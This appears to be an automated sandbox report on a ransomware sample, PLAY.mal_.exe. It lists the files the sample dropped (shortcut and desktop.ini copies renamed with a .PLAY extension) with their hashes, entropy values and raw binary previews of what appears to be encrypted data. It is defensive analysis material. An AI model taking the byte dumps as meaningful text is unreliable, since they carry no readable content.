        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1240
        Entropy (8bit):7.836229707938324
        Encrypted:false
        SSDEEP:
        MD5:5B0E4DE08C6577C0A4D8F573B3E355E1
        SHA1:445D7AD38FE3369AA2C48F31DEC79AF0C0A6B5AB
        SHA-256:D6AD79C951E05F015FC28CD463053F2C9CB31AF92D653D01868D2E3F075A3FF8
        SHA-512:6BF7381055343649C1092266FCB1C5CE50AE307D6CAEA7DD70BF045AD6A87DCAB03B709690BD544E9926DC800577C6C77152FD1347EB835FB822E8CDF33B0C7E
        Malicious:false
        Preview:.....H.~."..Zw.A.v.BJ*.x;.0c.g..{..@72....@G@|Zv......?=..{.30.U."j..D......aJ..W...S..}.z.$.t..n...6.k....`.3..N*@.H......]B8;:.]+R.V...$....1,.._..{.,.....R..r..HC]..U|...+...T..U.|.!.I>..........................s...F...3.'..f..V..Q."......Yn.B..1.N9.......F..>^i....U...$H.......,..F].62..I..1..qp.....2.5:AJ.s...IZq!.....~..jI.^k...!...o.G.......]....%..... .R...|h.i........3.,.rT..*j.C..7..Q..6@.(.a",..xY.........'b.u-|'~...+.....y.1.......qA......A^.d..l. ...YM~t).F.B...X._.L../O$.Tt.rw..z...A.`.~..k..).l$a.......A.Bd..?.;..T...w..L.v.hx2.v$V........l....A..~......G..i.j....0......>C..6:Ago..&....X..'....<.?~.(M.`U.l.0.....n.VD....XE.q>....uc.z.&....=....do.(s..I..f...O........0[...&NF..[.Q......+..%0.....(..)d.b;J..20...9.'......o!..<8..._.........)a.....|*rxT%o.c...Z.....]/..y..).n.L....W{.......Gm.@.Xx.>?i..%...as.2;..E.^.J8..@...6.h[Z.L8.1..C......V.).40...w............pbAx......T...T...$..'.en.......gg.;....M.-...6............h.`

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Documents\desktop.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1352
        Entropy (8bit):7.849673396173478
        Encrypted:false
        SSDEEP:
        MD5:AF94DBEC8F8B87D13FA9C49A07BBD59F
        SHA1:82A44581C9F80DFECA1577E0B14810CA9387A3C0
        SHA-256:C2922C4061B15B9B3F719938F6A8D5577EEF6461D20297B69286A5B6AC277FB1
        SHA-512:A39B9287AFE68448F1922BEF353DB0CAA9C7410F0AE814EC3301CA6234E65FC7F3F92FFA0BE46ACDDED396D33EB8242E268A5CCE3E8D7E0DFF7D01A2B95B5681
        Malicious:false
        Preview:i..!........+...._.....M........6r..~.:..9qrLcT?..u*...;E.a.TI.3.,...[.w.. UB.....v..1..2.6...q.;...x...=.*.........'..Q.{+W...)7..x..j.*H.....g.0rU;..a......&5..I].U...........i......<.|.fa.C.D......^...I"......A2V...F.bl...w....[......P.4.d....L.0r.......W&...>..Q.....T..U.|.!.I>............................&.ED"....7)95..QRW.N..4/A3.m.U_...2.E.N.e'+....i....d.j.^.\..:...>j.i.Q...........wrB....[...-5..7....(.XeO .........Fv.......^......G..K%...{/.P..{.L.....Sxn.<....}.sf.T....X..V..|.|.:pm.......F.Xp$..d+#....M...j......:......vQ.O.v..H:......+.N....p...`Ar.8.:af..4;.H%.@.o...//;..j.G#.`3V.!&.N..4....zm..H...LK.Q...B.%o.E..!..q.K..'._(=.......g;y.i....u....+.mi........6.e...y$3.......P...YN..fuL.c.../.....u....}.!..'..........ye.#....6.._..I}......k.Z.'x5.UQ..1..r*o..M.'~....?B...<.}=$.J...E....dO?.UGwH....})Y...Z.L.j.7....K.....:..A.t,...M..Jny.kq...{*e..h......-)..E...b.'M...nY.5.'.fO.^...H...E.....Y...&.F?{,q....n^....C

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\Desktop.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1528
        Entropy (8bit):7.87214955142188
        Encrypted:false
        SSDEEP:
        MD5:9AA40105840EC0D3266A6C0B474AD6EC
        SHA1:E48A4FEEF8B2DA686A05B05B9843E2EDCC481238
        SHA-256:8D2FF47CCD88C296EF4F364CF712FE2DE44F6F895731543EC0512A9F924CB796
        SHA-512:B2E8829E5E93B4727FD0B5B0213FCDE72352E6E327F9C809182EDB36BE3424289A8B1475AAF7028F0003CBCF26CA87542483E200D2904DA14590DF226CF1BE99
        Malicious:false
        Preview:..(.J$......9dP;...+0.l.|....D;..:9.@&....G.?..z}!.D..@..?.....w..%]..6.....y..,.C./uL=..,(6.$..?...a.w..N......'.;.#.c..Z...<~Wp...}0....$....n2..4B....J..(fM.Y.L........+L.ay..nZ=|..^d........ ...pFh....Q+)[}R...............l..$I...i..i;.....r.f..6o0..#.!2...)V.:..VN^.h....er.?:)v.&[.,`.0x.......F~%]....V. y 3.<h.K.p.$e. ..X.YP..23..[....$..7~Q......*.~?.Q..H57..B..X.}..[.......O..c...S...z..g.^].;.9U(.=.....8..~..&{).a..A...?..4Q`j.v=..[...T..U.|.!.I>..........................._0...89.P.B.T..^.bW..BtQ.8..^..+q`..p....S........"s..=....g.U..J..Q....=~.z.4.g.$...8,B.ds?..mG.x...[..9W.8.*c...q..K.iOV.(5..d..:{..hE.8.......3.O{.0OK..7sW.....Rx....-,...=mh...<*+..O....T.A...4....a.*Y....B......r....._7m.N.;.....R.^.2....t.qf.Q.....kB.a./.6.:...OJ..\_z..2*.0.'.^r.+.M..ghX....B......g.........L.K...y.N..J^q1..|.u.t.|...S.EIxb.z....g./..S...x.q..1. #k.S..<f..gC.W.o....cN..}.w..a".A...U'..X.....5...V_!W;%/......../]..KLxj......!.....Bev~P...

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\desktop.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1160
        Entropy (8bit):7.845543767503856
        Encrypted:false
        SSDEEP:
        MD5:DA6A758BC2F753E0D263C00A8AEAA497
        SHA1:431C6164F20C23FAB6E9495EDB04A42D89DF5088
        SHA-256:67622EF2D1738923B368D861B2EA5C33987BC883541B7DCAC8329D4D677B5025
        SHA-512:CB3513E43C52A70EBC82AB1843F7FE352F95715260686A8874943F9DA93BE79D0EAB7C80C82D5DFCD47DD240CEC7088533FC5B7D73FF085B8CC60FBBC89A8EEA
        Malicious:false
        Preview:^J.]?c..Fi>J.3wz.C.+....!..M.l.:...<..z...'...:......{K..+..x:b$h.W.{.~..;...$.k!G.c..tQ.)..~...T..U.|.!.I>............................|.I....\y.|.]..X.d...5..Z..L.kj9............\.Y/5.O....\..!x.#..ZT..I2d.l.m.C..ap.`.....9.$..m..z...N..6..``..74K.,%....{L.(.A.R.A......I@.....6.'Y)...YwR.pXnOh...k....ps. ..`.1../..G8...e.J..4....y...*..QQ.\..Y..T.......`.Q.cH.[\^.a.... 2..F..a...y{....t...*..(&.P..P0..E.\...2..g?z...]%.o=..B.d....!q......v.$.T]'C..i.6......H.\R))..Lu.\e...D Bcm..:.+q%9v.......<...../..j.....P...N.g.v5.d....>..... =;.....X..Ha.G.[v.#4.s...~.i.....Vy.....y.y?O~e.4.|........i.i.RnH..[....b.D..x8Z.r..-.O8r0..f..-....`..........3e.k.+5...6xA.E...hS....}C"p...F>.G.5.A;.IS...E{.qf.....Qj..I.b...*..V*=.Li.N.@.:.cS..1..p.mP...J.........o.8...6..].u3,s....^.xdXh_[..S..V.+Q.y.!..*6'..*....LR.m.F..k-...E.{.....)...K.m...q/.a.,...C....<Cc;.C$..L.9..K.,............A...8.i.......:.H...7.d_w...7&&.y;.$......ve.0.cS..X>.f....H.P..p.....!6

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\desktop.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2440
        Entropy (8bit):7.924204299775155
        Encrypted:false
        SSDEEP:
        MD5:9BBE0248E41922FC2277B5150A468D0C
        SHA1:C64C279566CC36961AFF341BC03C560AA42CB57E
        SHA-256:73C79C43739188C3CF8FFCE15DD196BC54460E002B6D1D24F444E66C12DCC5CF
        SHA-512:1D625EE98FD53A5C0BDBAA4A6BD7C95F1A94FE13A789F20C7BD1C2B4E2023863DF0D42DB09D27697E832DB24D22ABCF831F2864D3FF12410DD87CED1D479C5F5
        Malicious:false
        Preview:.}tb...&`a. ....y$..E..#.Y......~........m.|.@r]...cn....d.a.$...Ld.c.].....C!n*WS..#..g<...-......M)..S$o..*.%.T......h.o..r...:=../...[s}.Y.5.1.<.1..2.,H.gzN...>....q....+.....T.+..W.i.%....L.b.c.f(4u..'.....xU.....hyyf.}.l.....O....x...............{s.%...#qpa..wUh$..=P.8.'...b.G.HR..?.v....{:L2(.s.t.&.z...,O..Tg.'.....L..M.].E...F..bz..L......;.*VP2/^.V.)g.^.'...8..8Z2...L....&.P.....h..7.1.9...zJ_...<../.w..-d.`..@..-..01.....?k...d...V{....J.c.)J.....y..|.t..A.D.A!^...T^.O.Ia.5<o.r....&.0...^,@...I.2......&!/.uQ........1..76...aO.5.po. s....nb.0L....e4h..j.o....(..P.`....!...y? t..C.|d.?.....c..p`.e#.....Q65.,..&.C..83.X.B.dN.....S.)...r..L.4k..H.A...$u.{.{H...EY.s..$j...a.._W%".J.+....Z...v.&..jF.G4..2.d#1.O...(..%d.Xt..u]y.Po..1f...:..%.`.7....Y.x....+....C.!.....1#;.ez..B.R.........'P...2...{..v....M.3 ..z.......-...>.5.V.....wvG.+<Z.w.$Z.a...R)W..CR...R........f......}.y..%:.......w..g..Jlo....D(..\gxX<n?.y.l._.h.b:.....O.......x.0J..m.

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\desktop.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3816
        Entropy (8bit):7.955760018314402
        Encrypted:false
        SSDEEP:
        MD5:C8E9B150CC990AA2EF3F9E42679A84FA
        SHA1:6C1E21302B4A1DE11567DB41B72E9EFBA9A5E9C2
        SHA-256:E6AA5A0C8CAE4F9BDCF59B033099064B49CF9C1576DB47872FBC1C6E7765F190
        SHA-512:E006CBCA8BB8B95E1B5E6FF6DDBA32297A974DCAC732963AA8418A88F3697E29236BEB6E7658EF0F57672B8F515001CD4923BAC53B05B18E9ACC1E74A89000E1
        Malicious:false
        Preview:..S.......%...1..t..8.+.v......W.<.7:....M4_...........L#.....h...]..VV.._\.......Lc.\N....mB.<...A..f.6/..e"..V..k.0..9.N.D..+".,....X...?...Ro.y..q.|...e.j.w...(._......i,.....N8{..JY..w.p.)..Z\.)...*U...j..'.......dE........]K..q.A.v.Qq.......4MQ,..f.r.n.`U...5.....v....~...(.WR.^..L..B."7........-=.. ..E.lZ.....n..?0......#....7....w....D$f(..{K..Z.."..e+....x.he....q.u..H.j.B....?.. ....Y_B/.=..b:.Gj....1=.. @9-3.y{..}....8.YbK..:~.o%Y..Q....=.H.].X.V.q.sKR....}...[.R.{...~.f=H/.:@1.57......;!hg...K.N4..:......C&...U.......'..C:|ziX....D.^F.A1\.T....p...'SZ~.F.....[M.....t..K&Y.!%......`.......`.].=.b.7vDW..wd..s...D..d......*.APp.....+.G[I.....(.[}U?..Cz.../..<S....a...`r96..$.....ER.."H\P...6._.. '....Kv...=...6R:~.\ra..%..n7.........}..*...4+.4r..z..Xg.........K.'....R7.......I..c...q..Y..J...J%C..z..#.EH.O.`.D.Lt..D.:...sy....K..E..7k..u$.0R..k......'.@$........}..#~.9k....g/..p..-.....|.{.:.k.Odt..V..Kf}.1Mr.S..G.;....

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\Get Help.url.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1256
        Entropy (8bit):7.83695588511468
        Encrypted:false
        SSDEEP:
        MD5:57A89A394A7F0399161AB24A627E0CA0
        SHA1:16E5B621C3F67DB4C5A131C720F57964D1556505
        SHA-256:81A7E73C685D4DBC3E0AFD31247F74C3D0ECEC2DACC370DD2C304E290CBD2F09
        SHA-512:C75780F924560062AEF155BA660B84A3145A5D79059B50FD3FF2CCD3684DC8FE03239AE3221D4219187BDEDAE65166E13777167A35EE1206A2F702BC836B3AD8
        Malicious:false
        Preview:...h.H6%.Y^.y.,.+*.^?.I........y@uiLwn..k.@...........Z.m..d...r6....f...N_.^9...,..)8.%.F?.8&.@.......x.{.......=..w...B.XTk.`P..a.....py}...KR.<......: .....)G.....P8/..b..4J8.3...T..U.|.!.I>...............................1......X..!..BX.&4........;.9...3-.N..<D....-w.b....8...8u....~.;<...06S.(...+.U....2...P..3+$E..'...Cjw.c0y.|...i...|...v......B..xI.....K.....&...1f..cG.7)..:<.....@C.i...v..w..*..R...f.C.R.7.c...p(.#..iT{.'8.......V\.>.....R.>..F.]*.U...-..o.[P..../..........oi.7}..d!.....~t=S.y..*...._.g.u..;5.&\|...i^../....S...s.....T2Z.......H...c4.tZ......^i.L/.,~..hd.dY.......`..EG...zI..z.DBs.{.KIR..M...Jp.K..w>..\..&....wOf...0//5.c?..Q.%.=.D")..c.'ev..&.G............b..X.=E3.."... l9..Gi...=..R$......Pe..TQ......H.W.......n)....[W:.O_.,Y.o...e....|S.t..t~.[.......y.y..O....u7..x*6.].>a".0.....A[..>....../f..S)..(.MQn..4.......Z..yW.w['1.P.GZ.}:D..U....Ji.....[...}..).d...n.....-.......xG..f..j)8.m....C.|.<o

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\Visit Java.com.url.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2280
        Entropy (8bit):7.910648446094838
        Encrypted:false
        SSDEEP:
        MD5:7D6736E1CCE485E6849B062E8855CB9E
        SHA1:70223E7215B6804707728392DBB3C9093DA631E1
        SHA-256:60DD3EBF88CDE31BDFCF1A2D52B518602D80A9A8C93AECE0F9009DEBE9E6F587
        SHA-512:316533D4F66E61D088EEC0ABE690C0D2A52E250CFB565FB17E062F451B4557593F6679201DA87B8FB40DED3F3E68615A1463EC68ABF37CC664E9D65B2907E6C5
        Malicious:false
        Preview:n.EU.Hp..TO*...e.j.b.nZ..O..cKp..).$.wC,..KG.f...........N...|P$....22...\.<.$.-....8.U6.5...k.vG...'J~.I.[...+}.{..!.[0.u)...P..OY..E.6.......H. |.....M..r.8.....]\...7.j..|........n...Nl#{....Lg...<..Z......6ppH.HIn*...%.}>..X.h....-G;T.a...X..1....wfTK.r.6.i...)sSr..oX..bH..U)...P... ?H0.y....|!tuPh......0...o...X.}.Rr..XJj....(....0...d/n.x.../&M..bLCA..:.%..hL.2.uA>DTX...I....97.P".b..-.q%.~.B..wp3..Q*..B...|.)g.....4hq.|...s....(S..H...-..v..s..|.XR..'GJ...{y...X...0.....E.j.......)..).}Z.N..l.u..w.He........S.(#..{&..:..G/V.B......].u.I.=K.XW.V[A=).dv......LB.I..}A .....C....XC.....FJe....D.1[;....4E..7......'..U.^9.bP(.$FE.lD.9mv.KA.I.8...6..h.....A(=v...T.q..*m.#dg.'`}.y~.....mx.?.J.g.....o..........D.0..l.a..$.&n/.@..s.qq......g../._`4aICT:..S.|...........:.~....y+o."n...V.....V.b.YI.S.%...Q..U.....q'........h.P2/2.881...G.!f.PR..w.....7?..C...1.71.XA.&_bU...h=...}...,..c[.:'....8...7&..D../[......9..q.w..z.`.7F..........i....Q

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\Desktop.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1240
        Entropy (8bit):7.842681093540845
        Encrypted:false
        SSDEEP:
        MD5:D7E0E64A051DDE1DC9F23C23351DE907
        SHA1:15E7F96CDC08F7FC0AECBC3453E1D73100D17C4C
        SHA-256:8A8BAAA4A3C99FCE2A1A46F0BDC0157AD9A83DCD3BE994C122996A68D0FDC852
        SHA-512:C5B3C1A5A7A396FD14E11A76DA42000D33CF52839C8B1F66F55B8D5583DE80F82964D93E5D66F98854507DD62FC8AD3E5688EB8BE333A01A683ED8AE062E83FC
        Malicious:false
        Preview:N+.(a2..i..j...].J6.........Ke..j...}..m.%V.`...^A.M.v_.Y..v.........s....TQ....D.....r.l.....Fq..+.G...M...:]..O..........]F.i.I..9[`.~..z....:3.....ut&`H......7...T..U.|.!.I>............................ .R5..S..b,..i........f....S.<i...\..[.L.^^ ..?..W..?PI..2a.~...NA.8b.-Z.7.d..F......P...z.-.Ax'.....^.Y..-.q+.}......rO.......l..../).h.[.v{..A...D.-.,..QU.cg...@....?.}}.`........x...T+.`.&/+w+....0P...FX)..1-.R..E..b.33...."J.K8..a............me..!......>....^I..]1.H.k..X%..m....k.....&H..o..{..d*Gnf..g..K.?.Q[...}.dtP..i.$..NX..V..0.~@..NkGf..t..,.HG...m7..4.4.....a......+.q.z..........c...4GhA.........R1F.E .4..,.y.: U..TK.;.X...<V~....OP"Y#.h..|.0.D8...2.)t.-s)..X.H>.wr.W...8(F}'.c._...^...kj...s..2.[..eTI^.S...2..;...Um.Z+...<..XS.@.6.]..G...$.L#..p..#...}.s..$U..)..f...S(>b.u...Y....&_6m?V.S<K.W.|O..=.KGp..9.W2s..K.v....Z8..Z5U.S..1.YH..T.A$.k....|wB......u...MN.P..=.....1..MA.........;..^~...U9.."......l."W<.k9.[1>.A...n.

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office 2016 Tools\desktop.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1560
        Entropy (8bit):7.866758026937131
        Encrypted:false
        SSDEEP:
        MD5:CCAEA2DF92EA357F568177BBACA30B57
        SHA1:0ADA776ED7FDB8EF750B82F74CDB07019C5DF49F
        SHA-256:72CC98B82ABDA23256E12B122FC6D8BC45506AA2D8A69BBD167EAC9F02430E23
        SHA-512:68C6681A6A95A11B2893591CC0C73C9A13C61531026E1D11356E94ABDFEF79BC7B2129C91B7679D444405F06D3535EA409A915BCFE037CD05E94A7EED78CCCD8
        Malicious:false
        Preview:\..B.(./s.(/.dD.U...B.s.Z.._.H..JB.b..?.F....'&.......k..1....:j..h_....80n..iD.j....u.x.-....z..s.<,.D.t...}wZO..|..bB.....V..%Pr......f .i.(..>.s.k.......Z.}.o...".'..i./o.l.9.. D....3.T....<.&.7..)..g.l...D.P\..+J.....H$....e?i.0..yT=....}.%..".g.7.^).l(.....7.X.......7.-6.|....a.......u.(.CQ.~...........67.8.E............. ?.....~.Em.....C..oy..R...xOZ.X.9....0..T..`..Y.o...SFw....&.......Ql$.M...E..C....t.D`R.o.....u7i.Cw.).]..6......l.8.D...3..1U.o.DC..,... ....T..U.|.!.I>.............................}6.7q.o.ee....r.k.w$B9.....t._.$j."N@7+d...h.h.........IOkD})...........$h!.....0.$...GL..Z.zG.=..#..fs.rJ.<....../.......I......&X.Z....CJ)SL..._.T"}.Q..).<...<...E.A..E./.{c.c...t=....b... ..f...+EZ..7L^.*..j...*...y.}X..<.....F0^...-.^.';.1....N.. .k".J ....q..a.....9"..?..x.'......s!dL....b..F...|.....F.|.2....[....l.].Z..ds..fb.H.....;.|....X4`.5.V~`GnP....Ij...gUo}o5J.... >.I.7f.:.".....n...F.=..F....i...4.oV3.J...e.6.wD..Z..A0

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\desktop.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1240
        Entropy (8bit):7.837482266234121
        Encrypted:false
        SSDEEP:
        MD5:A0A9044BE316653614895E02769DD72A
        SHA1:8D049112249A4D71115A778F9279BC41C93DEDE0
        SHA-256:033E38B30C050046A539C0E9C3919757B8CD34E1BA7D8AD7FE639D4E22F4B195
        SHA-512:69EF8ED8E2035A1B5EF5056EE034F3D77BDDACAAFFF4F014F11423DB0AFD2BA299556695D95626E6253DC542EFBA666164C58A27DFC1CD75DA2D71E76F42F48A
        Malicious:false
        Preview:..=....j6..C...SQ.....q.W..W..e.b?#T...N..9...0.b9.......2 ..b.q;....k.`1..2...(..55=].."..Q.....T..6..N.%........?..X#V^`....s.#o.TLa....l.~..].J8.0.J......#....%]...T..U.|.!.I>..........................\.k0.w...+..4....}S/n.}...?...y`..Y..d....c..n._w.....^.....t..}^B..P..A...h9(..7e...vF..=..cJq..J5.!.....U...c...M.y.m.R_X.....cvJ....]....V$|&.I..6.).2...@.........2....-o-.u.z<.....b\.^..t....#l"4.......>GQ.."...|.B..0...huB...m#...&.D...J..u...........0Ml....o........O^.f.....S....>..eZ*..qL.@..-...... ..3..9.K0.........S....fv.8........q.....P...~D.........z.{.z.*..i........g..E.y-..].r..6uF.pm.m.....T.....!b$.u...l..s......?g..........X.....t.....v.Jj.N....##.h.-?Z...;p).k.12........j:S.]..,RZR.8<......}...}z:.E...)x~2.......c.. ..j...0)mJ.....fE.......sO-z.j.........>.8..D{^P..t2b.....g.....nc.\(.#.:..&.$.....i/....9|.1.y ..b..'..V.l5..-..e%.,....<`*...2...+}.cG3............+..~..Gj...oz..2+ .*...........d...6ok...-

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\Desktop.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1448
        Entropy (8bit):7.870042651813873
        Encrypted:false
        SSDEEP:
        MD5:F6ABB7A487606A3B5F02291D8AD50E09
        SHA1:EC25AD06D852A98F2BA93D57CA93B4ED8275AB55
        SHA-256:C497CAACA14422B946F10A18A8D9D33AA0F551A56D3035EA55A766DF42E400AF
        SHA-512:042A7F6A9810F46B44FD7A80661C24B0F73F3C21AABDE4FCF77C1B44350F82F86E188F0FD5E761050F3DC2D65C15DB6695930E5BE570B5214AD48A80F6D061F6
        Malicious:false
        Preview:...Vz...O.tT)SH.e...>.....R0p...g9P.M.I..y..\O.....0X...b..<......$#....`.K.d.P@Y).d.#.JJ.v.T..L....K.n3D.H..tO..........O..Y.<.6.P.....E.bi.,.f^..1..?r.3..j....+..(.}....E..{...A...K..q........'.'l...`......Mi.G...m.`....X5..-C.....p.<..-}d.h|X...!j.?/.2..........,..L=@...0..N......h(,.eW..Y.ng.P.OG.....xj.(h.."xYD.k.6.X.ypf...(....6K.;.Jl7.m..).....nT.3.h......T..U.|.!.I>..........................V4U&....r\....!..i@...<..S..".DBm.q2..<k..............r..@....9|..2......G................./.t\.g....w.i..p.s[..7./o....+.......(.b`..u.rD.x|V...N.!.)...h.....O..}.s'....G....Q.M...'F.D..8axX...M.1.d.....N/.5au2.i.^...../Q.[.#...YZ^)J.aF..........]i..]fl%.{0.P...H......)....|...9.p.R..G....|sVz.*.T .........T..s......%...Lg.+(E_..2f..C...d.G.t..\Z.w.x-Rg.DF&`z,.}u.......6..Y..../........G.1..E..<..I....]1...Jpb...<.4...e.Q....c..f/.e[4B....jg;......;..U......"Y2g..w..`RT.|...O|$2......K.)-ZU...:.....9..Q.g'..Xa.o:w~.!#...D..u.)...l.{3

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\desktop.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1816
        Entropy (8bit):7.879227356949742
        Encrypted:false
        SSDEEP:
        MD5:16B865E4723C467BB3C33081CCB7ADC1
        SHA1:94368C96BC09703969E4BD8DE041D11534D27CEF
        SHA-256:299DB2B943B9E5D132CF25B4DCFEAC214D40D9C29D2FBC964FCA63FD14D6D6A5
        SHA-512:B89CAC30765E2821A782ADC68D991A8426511847477935D2DFAF2D13BA64DC0D5FB90AD5C3BB7190C3817969DDEFB639BE2CE13DADF650E88E65C2049297D408
        Malicious:false
        Preview:..?..x.Yj.........w'+f.m..& .X...2..J.......".._..T.5..YRB.Yi...8Q.u*......"v..+2..}T....o....G4.....#..09.....W.5$-....b.....r.N.:.......6^L...P.....7r._.Z.>7..P..!a....l(.w.&y.#.f..Q.0...T.)(.{...E.u.E.....B^^......I~...R1I.ddn".z.A...E.@v{1...9$P.~...M#.@..5X.Q.^wu..vE....K.....I.T....<...9....Ydue$..........H._.N.#.>...k.r#e}.G.?.W.#.......FT$.r..%96V.`..7.p...` l..'l..5*...._....bV..=.p...8.......p...#.E..D.P.K..j.m...b._......zT.4......;\.xM.....79.....V...`.EA..o0-O...ta.~..w ..3u.uf..7-.. ^/...T........G..;.1..o....#.D ....XaL$..,BC".-_.R5..G....`..&05.T...^..i..Fa.d.[6H..r.........n.vA@. .Q...bbfi.<.....u..'g.AC2-R.......X......Ph[Y.= .....K1.....Y..F..^.x.NP.c..K..P..).X.pX.<x.L...K@2..S.....hQ}.T...T..U.|.!.I>...........................-?2..w....!.,.....m.E<..'.).../.9v?...t.m...J@v.*_Uq3...&..i.....r~X.D..:.D.H...!."..q..U.[.2..b.Hiu?..I.......PI=.+.....G..u.0.S.c)..=..kv.?.w..t..Z79.T.c.....Qs.W.......J../Z.q..H.~....p(p......G..

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\desktop.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1240
        Entropy (8bit):7.819328164318204
        Encrypted:false
        SSDEEP:
        MD5:6A9D096D5617859A458FCBD5ADF1D988
        SHA1:ED3F0F5ACDE61D81FCEDCA2ECADE22EDDF9BBF6C
        SHA-256:DEBAEF40E146FE3E61AFCD52FA8B216D236AD004EED52282EB1DBB1E409B5DE8
        SHA-512:41A5F7C226D670E53965FFB611234A753B1F17FD4223238C18130E06B7930641F8D4E4057BCB9ECE165C47F90883D9CA2CAA3EF254F632CE3A44D857BABB355E
        Malicious:false
